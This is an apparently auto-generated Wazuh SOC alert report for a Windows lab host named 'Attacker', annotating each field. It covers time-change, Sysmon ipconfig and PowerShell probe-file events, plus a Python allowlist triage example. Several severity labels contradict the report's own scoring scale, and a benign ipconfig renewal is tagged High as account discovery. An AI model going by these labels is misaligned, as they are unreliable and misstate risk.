data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.365+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.509200
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:01.6175627Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43812
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: 2025-04-24T22:32:00.197033200Z New Time: 2025-04-24T22:32:01.616986800Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-24T22:32:00.1970332Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-24T22:32:01.6169868Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.396+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.396+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.512405
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:01.6277365Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43813
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: 2025-04-24T22:32:01.625752900Z New Time: 2025-04-24T22:32:01.626929900Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-24T22:32:01.6257529Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-24T22:32:01.6269299Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:10.432+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:10.432+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533930.515610
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:02.0990286Z
When Windows wrote the event (UTC). Note it is 2025‑04‑17, a week before the Wazuh timestamp of 2025‑04‑24: the agent shipped a backlog, so build the timeline on systemTime/utcTime, not on the ingest time.

data.win.system.eventRecordID:  212287
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service itself, not the process described. The created process is eventdata.processId.

data.win.system.threadID:  4740
Thread of the logging (Sysmon) process. Ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's own channel, separate from Security, Application and System.

data.win.system.computer:  Attacker
Computer name stamped into the event. Should equal agent.name; a mismatch means forwarded or relabelled logs.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:37:01.957 ProcessGuid: {94294ddc-2e2d-6801-e307-000000000e00} ProcessId: 7128 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ParentProcessId: 4044 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
Rendered event text. Same content as the eventdata.* fields below, kept as one string for grepping; filter on the parsed fields instead.

data.win.eventdata.utcTime:  2025-04-17 16:37:01.957
Sysmon's own timestamp for the process start (UTC), the most precise time you have for the action.

data.win.eventdata.processGuid:  {94294ddc-2e2d-6801-e307-000000000e00}
Sysmon process GUID, unique even across PID reuse and reboots. Use it to join this EID1 with later network, file and registry events from the same process.

data.win.eventdata.processId:  7128
PID of the new process. PIDs are recycled, so pivot on processGuid, not on this.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
Full path of the executable that started. The doubled backslashes are JSON escaping from the Wazuh decoder, not part of the path.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version string from the PE version resource. Attacker‑controllable metadata: a hint, not proof.

data.win.eventdata.description:  IP Configuration Utility
Description string from the PE version resource, same caveat: anyone can build a binary that claims this.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource. Cosmetic and spoofable.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. Spoofable; trust the hash and the signature, not this.

data.win.eventdata.originalFileName:  ipconfig.exe
File name compiled into the PE. When it differs from the name in image (e.g. ipconfig.exe renamed to svc.exe) you are looking at a renamed binary, a classic evasion tell. Here they match.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
Exact arguments. ipconfig /renew only re-requests a DHCP lease, benign on its own; judge it by the parent chain below.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
Working directory of the new process. System binaries started from user Temp or Downloads are a flag; System32 is normal.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. SYSTEM here because the parent is a service-launched script, not because anyone logged on.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
GUID of the logon session. Joinable to Security event 4624 to see how the session was created.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3e7 is the well‑known SYSTEM session that exists from boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 = services and non-interactive; interactive desktop sessions are 1 and up.

data.win.eventdata.integrityLevel:  System
Integrity level of the process (Low, Medium, High, System). System means full privileges, so watch what else this parent spawns.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
Hash(es) of the image file, in the algorithms Sysmon is configured for (SHA256 here). Pivot on it against your allowlist or threat intel; the same hash on every host means the same binary, even if renamed.

data.win.eventdata.parentProcessGuid:  {94294ddc-2e25-6801-d807-000000000e00}
Sysmon GUID of the parent. Join it to the parent's own EID1 to walk the chain further up.

data.win.eventdata.parentProcessId:  4044
PID of the parent at the time. Recycled like any PID; prefer the GUID.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
Who spawned it. cmd.exe is expected here because a batch script is running; cmd.exe under a browser or an Office app would not be.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
Parent's full command line: cmd.exe /c running VMware Tools' resume-vm-default.bat, the script VMware Tools executes when a VM resumes, which renews the DHCP lease. That explains the SYSTEM ipconfig and is expected on VMware guests; nothing to chase unless the script path or hash is unexpected.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as. Same SYSTEM context, consistent with a service-launched script.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:21.166+0000 | 🧠 MITRE: Command and Control – Ingress Tool Transfer [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:21.166+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533941.521070
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider. Microsoft-Windows-Sysmon again, so eventID 11 below is Sysmon's File Create.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Provider GUID, identical to the EID1 alert above as expected for the same Sysmon install.

data.win.system.eventID:  11
Sysmon event ID 11 = FileCreate: a process created or overwrote a file. Not a Security-log ID.

data.win.system.version:  2
Schema version of the FileCreate event.

data.win.system.level:  4
Windows level 4 = Information. Sysmon logs every event at this level.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:58.3562531Z
When Windows wrote the event (UTC): 2025‑04‑17, a week before the 2025‑04‑24 ingest timestamp. A backlogged event, so timeline on this, not on the Wazuh timestamp.

data.win.system.eventRecordID:  213065
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event (the same 3712 as the EID1 alert), not of the process that wrote the file.

data.win.system.threadID:  4740
Thread of the logging Sysmon process. Ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Sysmon's own event log channel.

data.win.system.computer:  Attacker
Computer name stamped into the event; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:37:58.354 ProcessGuid: {94294ddc-2e5b-6801-fa07-000000000e00} ProcessId: 12712 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vmq431i2.0u4.ps1 CreationUtcTime: 2025-04-17 16:37:58.354 User: Attacker\Attcker1"
Rendered event text; the eventdata.* fields below are the parsed copy to filter on.

data.win.eventdata.utcTime:  2025-04-17 16:37:58.354
Sysmon's timestamp of the file creation (UTC).

data.win.eventdata.processGuid:  {94294ddc-2e5b-6801-fa07-000000000e00}
Sysmon GUID of the process that wrote the file. Join it to that process's EID1 to get its command line and parent, which this alert does not carry.

data.win.eventdata.processId:  12712
PID of the writing process at the time. Recycled; prefer the GUID.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: powershell.exe. Whether that is a problem depends on what it wrote and who launched it (join via processGuid).

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vmq431i2.0u4.ps1
Path of the file created. __PSScriptPolicyTest_<random>.ps1 in the user's Temp is the probe file PowerShell writes at every start to test whether AppLocker/WDAC script enforcement applies: a well‑known benign artifact and the reason this rule is noisy. Before closing, check that the same processGuid wrote nothing else to Temp.

data.win.eventdata.creationUtcTime:  2025-04-17 16:37:58.354
Creation time on the file itself. Equal to utcTime for a brand-new file; an older value means the file already existed and was overwritten.

data.win.eventdata.user:  Attacker\\Attcker1
Account that wrote the file, Attacker\Attcker1: the domain part equals the hostname, so this is a local account on the host.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
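One way to encode the triage that the two Sysmon alerts above call for, as an added example rather than anything SOCscribe or Wazuh ships: a small allowlist that clears the VMware Tools resume chain (cmd.exe /c resume-vm-default.bat starting ipconfig /renew as SYSTEM) and PowerShell's __PSScriptPolicyTest_*.ps1 probe, and sends everything else to review. The field layout mirrors the data.win.* keys shown in this report; the allowlist entries, the verdict strings and the sample alerts (transcribed from the alerts above with the decoder's backslash escaping undone) are assumptions of the example.

```python
"""Allowlist triage for Wazuh-shipped Sysmon EID1/EID11 alerts.

Added example, not SOCscribe or Wazuh code. Field names follow the
data.win.* layout in this report; the allowlist and verdict strings
are this example's own conventions (assumptions).
"""
import re

# Known-benign process lineage: VMware Tools' resume script renewing the DHCP
# lease after a VM resume. All four patterns and the user must match.
BENIGN_LINEAGE = [
    {
        "name": "vmware-tools-resume-renew",
        "parent_image": re.compile(r"\\cmd\.exe$", re.I),
        "parent_cmdline": re.compile(r"\\VMware Tools\\resume-vm-default\.bat", re.I),
        "image": re.compile(r"\\ipconfig\.exe$", re.I),
        "cmdline": re.compile(r"\\ipconfig /renew$", re.I),
        "user": r"NT AUTHORITY\SYSTEM",
    },
]

# PowerShell writes this probe to %TEMP% at startup to test AppLocker/WDAC
# script enforcement; benign when, and only when, the writer is PowerShell.
PS_POLICY_PROBE = re.compile(r"\\AppData\\Local\\Temp\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I)
POWERSHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)


def triage_sysmon(alert: dict) -> dict:
    """Return {'verdict': 'benign'|'review', 'reason': str} for one alert."""
    win = alert["data"]["win"]
    ev = win.get("eventdata", {})
    eid = int(win["system"]["eventID"])

    if eid == 1:  # Process Create: the whole parent/child chain must match
        for rule in BENIGN_LINEAGE:
            if (rule["parent_image"].search(ev.get("parentImage", ""))
                    and rule["parent_cmdline"].search(ev.get("parentCommandLine", ""))
                    and rule["image"].search(ev.get("image", ""))
                    and rule["cmdline"].search(ev.get("commandLine", ""))
                    and ev.get("user", "").upper() == rule["user"].upper()):
                return {"verdict": "benign", "reason": rule["name"]}
        return {"verdict": "review", "reason": "process lineage not allowlisted"}

    if eid == 11:  # File Create: only the policy probe written by PowerShell is cleared
        if (POWERSHELL_IMAGE.search(ev.get("image", ""))
                and PS_POLICY_PROBE.search(ev.get("targetFilename", ""))):
            return {"verdict": "benign", "reason": "powershell-policy-probe"}
        return {"verdict": "review", "reason": "file drop not allowlisted"}

    return {"verdict": "review", "reason": f"no triage logic for Sysmon EID {eid}"}


# Sample alerts transcribed from the two Sysmon alerts in this report, with the
# decoder's JSON escaping undone (single backslashes).
SAMPLE_EID1 = {"data": {"win": {
    "system": {"eventID": "1"},
    "eventdata": {
        "image": r"C:\Windows\System32\ipconfig.exe",
        "commandLine": r"C:\WINDOWS\system32\ipconfig /renew",
        "user": r"NT AUTHORITY\SYSTEM",
        "parentImage": r"C:\Windows\System32\cmd.exe",
        "parentCommandLine": r'C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""',
    }}}}
SAMPLE_EID11 = {"data": {"win": {
    "system": {"eventID": "11"},
    "eventdata": {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vmq431i2.0u4.ps1",
        "user": r"Attacker\Attcker1",
    }}}}

if __name__ == "__main__":
    for name, sample in (("EID1 ipconfig", SAMPLE_EID1), ("EID11 ps1", SAMPLE_EID11)):
        print(name, triage_sysmon(sample))
```

The allowlist deliberately matches the full chain (parent image, parent command line, child image, child arguments and user) rather than the child alone: ipconfig /renew run by cmd.exe under a logged-on user, or the same .ps1 name written by anything other than PowerShell, still lands in review.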

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:26.207+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:26.207+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

